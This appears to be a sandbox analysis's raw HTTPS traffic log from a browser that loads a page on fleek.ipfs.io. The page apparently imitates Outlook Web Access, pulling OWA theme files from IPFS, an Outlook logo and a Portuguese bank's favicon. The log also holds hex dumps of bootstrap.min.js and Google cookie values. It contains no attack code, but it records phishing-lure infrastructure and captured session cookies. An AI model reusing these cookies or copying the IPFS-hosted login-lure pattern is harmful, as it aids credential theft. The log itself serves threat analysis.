                                                                                2023-10-12 15:42:17 UTC1133INData Raw: 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 22 29 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 69 74 6c 65 3f 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 69 74 6c 65 2e 63 61 6c 6c 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 3a 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 69 74 6c 65 29 2c 74 7d 2c 74 2e 5f 67 65 74 41 74 74 61 63 68 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 49 65 5b 74 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 7d 2c 74 2e 5f 73 65 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 72 69 67 67 65
                                                                                Data Ascii: Attribute("data-original-title");return t||(t="function"==typeof this.config.title?this.config.title.call(this.element):this.config.title),t},t._getAttachment=function(t){return Ie[t.toUpperCase()]},t._setListeners=function(){var i=this;this.config.trigge
                                                                                2023-10-12 15:42:17 UTC1134INData Raw: 65 28 65 2e 67 65 74 54 69 70 45 6c 65 6d 65 6e 74 28 29 29 2e 68 61 73 43 6c 61 73 73 28 6b 65 29 7c 7c 65 2e 5f 68 6f 76 65 72 53 74 61 74 65 3d 3d 3d 44 65 3f 65 2e 5f 68 6f 76 65 72 53 74 61 74 65 3d 44 65 3a 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 2e 5f 74 69 6d 65 6f 75 74 29 2c 65 2e 5f 68 6f 76 65 72 53 74 61 74 65 3d 44 65 2c 65 2e 63 6f 6e 66 69 67 2e 64 65 6c 61 79 26 26 65 2e 63 6f 6e 66 69 67 2e 64 65 6c 61 79 2e 73 68 6f 77 3f 65 2e 5f 74 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 5f 68 6f 76 65 72 53 74 61 74 65 3d 3d 3d 44 65 26 26 65 2e 73 68 6f 77 28 29 7d 2c 65 2e 63 6f 6e 66 69 67 2e 64 65 6c 61 79 2e 73 68 6f 77 29 3a 65 2e 73 68 6f 77 28 29 29 7d 2c 74 2e 5f 6c 65 61 76 65 3d 66
                                                                                Data Ascii: e(e.getTipElement()).hasClass(ke)||e._hoverState===De?e._hoverState=De:(clearTimeout(e._timeout),e._hoverState=De,e.config.delay&&e.config.delay.show?e._timeout=setTimeout(function(){e._hoverState===De&&e.show()},e.config.delay.show):e.show())},t._leave=f
                                                                                2023-10-12 15:42:17 UTC1135INData Raw: 74 2e 61 74 74 72 28 22 63 6c 61 73 73 22 29 2e 6d 61 74 63 68 28 62 65 29 3b 6e 75 6c 6c 21 3d 3d 65 26 26 65 2e 6c 65 6e 67 74 68 26 26 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 65 2e 6a 6f 69 6e 28 22 22 29 29 7d 2c 74 2e 5f 68 61 6e 64 6c 65 50 6f 70 70 65 72 50 6c 61 63 65 6d 65 6e 74 43 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 69 6e 73 74 61 6e 63 65 3b 74 68 69 73 2e 74 69 70 3d 65 2e 70 6f 70 70 65 72 2c 74 68 69 73 2e 5f 63 6c 65 61 6e 54 69 70 43 6c 61 73 73 28 29 2c 74 68 69 73 2e 61 64 64 41 74 74 61 63 68 6d 65 6e 74 43 6c 61 73 73 28 74 68 69 73 2e 5f 67 65 74 41 74 74 61 63 68 6d 65 6e 74 28 74 2e 70 6c 61 63 65 6d 65 6e 74 29 29 7d 2c 74 2e 5f 66 69 78 54 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69
                                                                                Data Ascii: t.attr("class").match(be);null!==e&&e.length&&t.removeClass(e.join(""))},t._handlePopperPlacementChange=function(t){var e=t.instance;this.tip=e.popper,this._cleanTipClass(),this.addAttachmentClass(this._getAttachment(t.placement))},t._fixTransition=functi
                                                                                2023-10-12 15:42:17 UTC1137INData Raw: 61 74 65 3a 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 6f 76 65 72 22 20 72 6f 6c 65 3d 22 74 6f 6f 6c 74 69 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 64 69 76 3e 3c 68 33 20 63 6c 61 73 73 3d 22 70 6f 70 6f 76 65 72 2d 68 65 61 64 65 72 22 3e 3c 2f 68 33 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 6f 76 65 72 2d 62 6f 64 79 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 27 7d 29 2c 59 65 3d 6c 28 7b 7d 2c 7a 6e 2e 44 65 66 61 75 6c 74 54 79 70 65 2c 7b 63 6f 6e 74 65 6e 74 3a 22 28 73 74 72 69 6e 67 7c 65 6c 65 6d 65 6e 74 7c 66 75 6e 63 74 69 6f 6e 29 22 7d 29 2c 7a 65 3d 22 66 61 64 65 22 2c 5a 65 3d 22 2e 70 6f 70 6f 76 65 72 2d 68 65 61 64 65 72 22 2c 47 65 3d 22 2e 70 6f 70 6f 76 65 72 2d 62 6f 64 79 22 2c 24 65 3d
                                                                                Data Ascii: ate:'<div class="popover" role="tooltip"><div class="arrow"></div><h3 class="popover-header"></h3><div class="popover-body"></div></div>'}),Ye=l({},zn.DefaultType,{content:"(string|element|function)"}),ze="fade",Ze=".popover-header",Ge=".popover-body",$e=
                                                                                2023-10-12 15:42:17 UTC1138INData Raw: 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 65 28 74 68 69 73 29 2e 64 61 74 61 28 46 65 29 2c 65 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 6e 3a 6e 75 6c 6c 3b 69 66 28 28 74 7c 7c 21 2f 64 65 73 74 72 6f 79 7c 68 69 64 65 2f 2e 74 65 73 74 28 6e 29 29 26 26 28 74 7c 7c 28 74 3d 6e 65 77 20 69 28 74 68 69 73 2c 65 29 2c 55 65 28 74 68 69 73 29 2e 64 61 74 61 28 46 65 2c 74 29 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d
                                                                                Data Ascii: ueryInterface=function(n){return this.each(function(){var t=Ue(this).data(Fe),e="object"==typeof n?n:null;if((t||!/destroy|hide/.test(n))&&(t||(t=new i(this,e),Ue(this).data(Fe,t)),"string"==typeof n)){if("undefined"==typeof t[n])throw new TypeError('No m
                                                                                2023-10-12 15:42:17 UTC1139INData Raw: 73 2e 5f 63 6f 6e 66 69 67 2e 74 61 72 67 65 74 2b 22 20 22 2b 67 6e 2b 22 2c 22 2b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 74 61 72 67 65 74 2b 22 20 22 2b 6d 6e 2b 22 2c 22 2b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 74 61 72 67 65 74 2b 22 20 22 2b 76 6e 2c 74 68 69 73 2e 5f 6f 66 66 73 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 74 61 72 67 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 48 65 69 67 68 74 3d 30 2c 74 6e 28 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 29 2e 6f 6e 28 6c 6e 2e 53 43 52 4f 4c 4c 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 2e 5f 70 72 6f 63 65 73 73 28 74 29 7d 29 2c 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 2c 74 68 69
                                                                                Data Ascii: s._config.target+" "+gn+","+this._config.target+" "+mn+","+this._config.target+" "+vn,this._offsets=[],this._targets=[],this._activeTarget=null,this._scrollHeight=0,tn(this._scrollElement).on(ln.SCROLL,function(t){return n._process(t)}),this.refresh(),thi
                                                                                2023-10-12 15:42:17 UTC1141INData Raw: 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 65 6e 2c 74 2c 61 6e 29 2c 74 7d 2c 74 2e 5f 67 65 74 53 63 72 6f 6c 6c 54 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 3d 3d 3d 77 69 6e 64 6f 77 3f 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 2e 70 61 67 65 59 4f 66 66 73 65 74 3a 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 7d 2c 74 2e 5f 67 65 74 53 63 72 6f 6c 6c 48 65 69 67 68 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 7c 7c 4d 61 74 68 2e 6d 61 78 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c
                                                                                Data Ascii: .typeCheckConfig(en,t,an),t},t._getScrollTop=function(){return this._scrollElement===window?this._scrollElement.pageYOffset:this._scrollElement.scrollTop},t._getScrollHeight=function(){return this._scrollElement.scrollHeight||Math.max(document.body.scroll
                                                                                2023-10-12 15:42:17 UTC1142INData Raw: 22 2b 6d 6e 29 2e 61 64 64 43 6c 61 73 73 28 68 6e 29 2c 6e 2e 70 61 72 65 6e 74 73 28 64 6e 29 2e 70 72 65 76 28 5f 6e 29 2e 63 68 69 6c 64 72 65 6e 28 67 6e 29 2e 61 64 64 43 6c 61 73 73 28 68 6e 29 29 2c 74 6e 28 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 28 6c 6e 2e 41 43 54 49 56 41 54 45 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 65 7d 29 7d 2c 74 2e 5f 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 74 68 69 73 2e 5f 73 65 6c 65 63 74 6f 72 29 29 3b 74 6e 28 74 29 2e 66 69 6c 74 65 72 28 66 6e 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 68 6e 29 7d 2c 6e 2e 5f 6a 51
                                                                                Data Ascii: "+mn).addClass(hn),n.parents(dn).prev(_n).children(gn).addClass(hn)),tn(this._scrollElement).trigger(ln.ACTIVATE,{relatedTarget:e})},t._clear=function(){var t=[].slice.call(document.querySelectorAll(this._selector));tn(t).filter(fn).removeClass(hn)},n._jQ
                                                                                2023-10-12 15:42:17 UTC1143INData Raw: 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 73 68 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 69 66 28 21 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 6e 6f 64 65 54 79 70 65 3d 3d 3d 4e 6f 64 65 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 26 26 62 6e 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 4e 6e 29 7c 7c 62 6e 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 4f 6e 29 29 29 7b 76 61 72 20 74 2c 69 2c 65 3d 62 6e 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 6c 6f 73 65 73 74 28 48 6e 29 5b 30 5d 2c 72 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f
                                                                                Data Ascii: prototype;return t.show=function(){var n=this;if(!(this._element.parentNode&&this._element.parentNode.nodeType===Node.ELEMENT_NODE&&bn(this._element).hasClass(Nn)||bn(this._element).hasClass(On))){var t,i,e=bn(this._element).closest(Hn)[0],r=Fn.getSelecto
                                                                                2023-10-12 15:42:17 UTC1145INData Raw: 69 61 2d 73 65 6c 65 63 74 65 64 22 2c 21 31 29 7d 69 66 28 62 6e 28 74 29 2e 61 64 64 43 6c 61 73 73 28 4e 6e 29 2c 22 74 61 62 22 3d 3d 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 29 26 26 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 73 65 6c 65 63 74 65 64 22 2c 21 30 29 2c 46 6e 2e 72 65 66 6c 6f 77 28 74 29 2c 62 6e 28 74 29 2e 61 64 64 43 6c 61 73 73 28 50 6e 29 2c 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 6e 28 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 2e 68 61 73 43 6c 61 73 73 28 77 6e 29 29 7b 76 61 72 20 72 3d 62 6e 28 74 29 2e 63 6c 6f 73 65 73 74 28 6a 6e 29 5b 30 5d 3b 69 66 28 72 29 7b 76 61 72 20 6f 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28
                                                                                Data Ascii: ia-selected",!1)}if(bn(t).addClass(Nn),"tab"===t.getAttribute("role")&&t.setAttribute("aria-selected",!0),Fn.reflow(t),bn(t).addClass(Pn),t.parentNode&&bn(t.parentNode).hasClass(wn)){var r=bn(t).closest(jn)[0];if(r){var o=[].slice.call(r.querySelectorAll(
                                                                                2023-10-12 15:42:17 UTC1146INData Raw: 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 7d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 2e 6d 61 70 0d 0a
                                                                                Data Ascii: ,"__esModule",{value:!0})});//# sourceMappingURL=bootstrap.min.js.map
                                                                                2023-10-12 15:42:17 UTC1146INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.449746142.250.188.237443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:10 UTC2OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                Host: accounts.google.com
                                                                                Connection: keep-alive
                                                                                Content-Length: 1
                                                                                Origin: https://www.google.com
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: empty
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk; 1P_JAR=2023-10-04-09
                                                                                2023-10-12 15:42:10 UTC2OUTData Raw: 20
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                30192.168.2.449764185.93.3.244443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:18 UTC1146OUTGET /owa/auth/15.1.1591/themes/resources/segoeui-regular.ttf HTTP/1.1
                                                                                Host: ipfs.tech
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                Origin: https://fleek.ipfs.io
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: font
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                31185.93.3.244443192.168.2.449764C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:18 UTC1147INHTTP/1.1 404 Not Found
                                                                                Date: Thu, 12 Oct 2023 15:42:18 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 13476
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Server: BunnyCDN-ES1-895
                                                                                CDN-PullZone: 1567618
                                                                                CDN-Uid: 070ccd6e-b4b0-4c90-b45a-e26d7534205d
                                                                                CDN-RequestCountryCode: US
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                                                                                Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                                                                                Access-Control-Allow-Methods: GET
                                                                                Access-Control-Allow-Methods: HEAD
                                                                                Access-Control-Allow-Methods: OPTIONS
                                                                                Cache-Control: max-age=60, stale-while-revalidate=3600
                                                                                CDN-CachedAt: 10/12/2023 15:42:18
                                                                                X-Ipfs-Path: /ipfs/bafybeigblu4qxovihlbwqqqsnlmsccggutlinilmydzv2dlowtaoerxu4q/owa/auth/15.1.1591/themes/resources/segoeui-regular.ttf
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                X-Request-ID: 4a917be885aa40f00475666d8981c076
                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                Content-Security-Policy: upgrade-insecure-requests
                                                                                X-XSS-Protection: 0
                                                                                X-Content-Type-Options: nosniff
                                                                                CDN-ProxyVer: 1.04
                                                                                CDN-RequestPullCode: 404
                                                                                CDN-RequestPullSuccess: True
                                                                                CDN-EdgeStorageId: 895
                                                                                CDN-Status: 404
                                                                                CDN-RequestId: 674357eb9fdf643de7a38a4b396cd64d
                                                                                CDN-Cache: EXPIRED


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                32192.168.2.449766142.250.217.132443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:18 UTC1148OUTGET /s2/favicons?domain=novobanco.pt HTTP/1.1
                                                                                Host: www.google.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: image
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk; 1P_JAR=2023-10-04-09


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                33142.250.217.132443192.168.2.449766C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:19 UTC1149INHTTP/1.1 301 Moved Permanently
                                                                                Location: https://t1.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://novobanco.pt&size=16
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                X-Content-Type-Options: nosniff
                                                                                Date: Thu, 12 Oct 2023 15:42:19 GMT
                                                                                Expires: Thu, 12 Oct 2023 16:12:19 GMT
                                                                                Cache-Control: public, max-age=1800
                                                                                Server: sffe
                                                                                Content-Length: 332
                                                                                X-XSS-Protection: 0
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Connection: close
                                                                                2023-10-12 15:42:19 UTC1150INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 31 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 56 32 3f 63 6c 69 65 6e 74 3d 53 4f 43 49 41 4c 26 61 6d 70 3b 74 79 70 65 3d 46 41 56 49 43 4f 4e 26 61 6d 70 3b 66 61 6c 6c 62 61 63 6b 5f 6f 70 74 73 3d 54 59 50 45 2c
                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://t1.gstatic.com/faviconV2?client=SOCIAL&amp;type=FAVICON&amp;fallback_opts=TYPE,


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                34192.168.2.44976888.99.162.33443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:23 UTC1150OUTGET /download/microsoft/70674-outlook-office-outlook.com-email-logo-365-microsoft.png HTTP/1.1
                                                                                Host: www.freepngimg.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: image
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3588.99.162.33443192.168.2.449768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:23 UTC1150INHTTP/1.1 404 Not Found
                                                                                Date: Thu, 12 Oct 2023 15:42:23 GMT
                                                                                Server: Apache
                                                                                Content-Length: 196
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                2023-10-12 15:42:23 UTC1151INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                36192.168.2.44976940.68.123.157443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:27 UTC1151OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pbyn4W+5ton1rMl&MD=KLoN7mFB HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                Host: slscr.update.microsoft.com
                                                                                2023-10-12 15:42:28 UTC1151INHTTP/1.1 200 OK
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                Content-Type: application/octet-stream
                                                                                Expires: -1
                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                MS-CorrelationId: fb16fd31-352a-4bfa-86a5-1c9bce77a3d5
                                                                                MS-RequestId: 6592f719-ac8c-4c29-b2ad-f4be007f3f7d
                                                                                MS-CV: N6od3yGlkU6WO5hX.0
                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                X-Content-Type-Options: nosniff
                                                                                Date: Thu, 12 Oct 2023 15:42:27 GMT
                                                                                Connection: close
                                                                                Content-Length: 24490
